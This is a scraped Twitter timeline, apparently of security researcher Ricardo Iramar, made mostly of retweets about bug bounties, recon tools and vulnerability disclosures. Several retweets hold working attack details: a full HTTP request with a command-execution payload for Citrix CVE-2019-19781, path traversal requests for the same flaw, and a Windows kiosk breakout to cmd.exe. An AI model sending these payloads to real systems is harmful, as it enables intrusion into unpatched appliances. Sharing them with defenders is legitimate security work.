Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @ricardo_iramar
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @ricardo_iramar
-
Prikvačeni tweet
This is a story how I accidentally found a common vulnerability across similar web applications just by reusing cookies on different subdomains from the same web application.https://medium.com/@ricardoiramar/reusing-cookies-23ed4691122b …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Ricardo Iramar proslijedio/la je Tweet
@ngalongc,@EdOverflow, and I are starting a new security blog. In our first write-up, we will discuss the impact of "SameSite by default" and how it affects web app sec. Feel free to request future topics you would like us to cover. https://blog.reconless.com/samesite-by-default/ …pic.twitter.com/5R23YmpksT
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ricardo Iramar proslijedio/la je Tweet
Findomain 1.2.0 is out! The last benchmark resulted in Findomain being able to resolve 33668 subdomains for google[.]com in 580 seconds (3480 subdomains resolved per minute) using --threads 100. https://github.com/Edu4rdSHL/findomain/releases/tag/1.2.0 …
#BugBounty#hacking#recon#tools#osint#subdomainspic.twitter.com/CCOdtBxScK
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ricardo Iramar proslijedio/la je Tweet
wow i just learned a thing about metasploit by accident that I wish I could go back and teach myself like ten years ago. i could have saved myself a collective year of typing and tab completion.pic.twitter.com/HVISG1g8O1
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ricardo Iramar proslijedio/la je Tweet
Windows Kiosk breakout tip: If you get a Printing panel, and the traditional methods don't work: Amongst the printers, select "SendTo OneNote" OneNote will launch -> Add new notebook On the Notebook -> New page Type: \\127.0.0.1\c$\windows\system32\cmd.exe Click the link
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ricardo Iramar proslijedio/la je Tweet
This weekend is your last chance to vote for the Top 10 (new) Web Hacking Techniques of 2019! Voting closes Monday.https://portswigger.net/polls/top-10-web-hacking-techniques-2019 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Amazing resource to automate an attack where AWS signed requests (including using temp credentials) are required. Saved my day! :)https://github.com/jmenga/requests-aws-sign …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ricardo Iramar proslijedio/la je Tweet
"Don't worry about this tech debt, we'll clean it up next sprint." Senior developer:pic.twitter.com/Es2JEKMryB
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ricardo Iramar proslijedio/la je Tweet
Apparently @jobertabma has lost access to his account and there's an important document we need to retrieve from this site. Can you retrieve the document before he does? An all-expense ticket for#h1415 could await. http://hackerone.com/h1-415-ctf#h1415Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Just saved my day this doc. :) OpenSSL Essentials: Working with SSL Certificates, Private Keys and CSRshttps://www.digitalocean.com/community/tutorials/openssl-essentials-working-with-ssl-certificates-private-keys-and-csrs?utm_content=openssl-essentials-working-with-ssl-certificates-private-keys-and-csrs …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ricardo Iramar proslijedio/la je Tweet
Voting is now open for the top 10 new web hacking techniques of 2019:https://portswigger.net/polls/top-10-web-hacking-techniques-2019 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ricardo Iramar proslijedio/la je Tweet
We need your help to select the top 10 web hacking techniques of 2019! Cast your vote here:https://portswigger.net/polls/top-10-web-hacking-techniques-2019 …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ricardo Iramar proslijedio/la je Tweet
For team blue: Turns out CVE-2019-19781 doesn't need a traversal, beware. POST /vpns/portal/scripts/newbm.pl HTTP/1.1 Host: <target> NSC_USER: ../../../netscaler/portal/templates/si NSC_NONCE: 5 Content-Length: 53 url=a&title=[%+http://template.new ({'BLOCK'='print+`id`'})%]
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ricardo Iramar proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Ricardo Iramar proslijedio/la je Tweet
I just disclosed a Critical SQL injection on a Starbucks enterprise database that exposed almost 1 million financial and accounting records - taxes, receipts, payroll. The Starbucks team was incredibly quick to respond, fixing it within 2 days.https://hackerone.com/reports/531051
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ricardo Iramar proslijedio/la je Tweet
Just posted Remote Code Execution in Three Acts: Chaining Exposed Actuators and H2 Database Aliases in Spring Boot 2. Using a payload containing three different programming languages :)https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ricardo Iramar proslijedio/la je Tweet
I guess this is a feature! Authenticated file read the original requests are intended to read JSON files however you can read others file.
#citrixpic.twitter.com/oLUVLu5yHQ
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Better late than never!
https://github.com/riramar/Web-Attack-Cheat-Sheet …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ricardo Iramar proslijedio/la je Tweet
CVE-2019-19781 start with a path traversal on the "vpns" folder: GET /vpn/../vpns/services.html GET /vpn/../vpns/cfg/smb.conf Patched if => HTTP/1.1 403 Forbidden
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Ricardo Iramar proslijedio/la je Tweet
The interesting part is how to convert a limited file writing into RCE :Phttps://twitter.com/orange_8361/status/1215207230514970624 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.
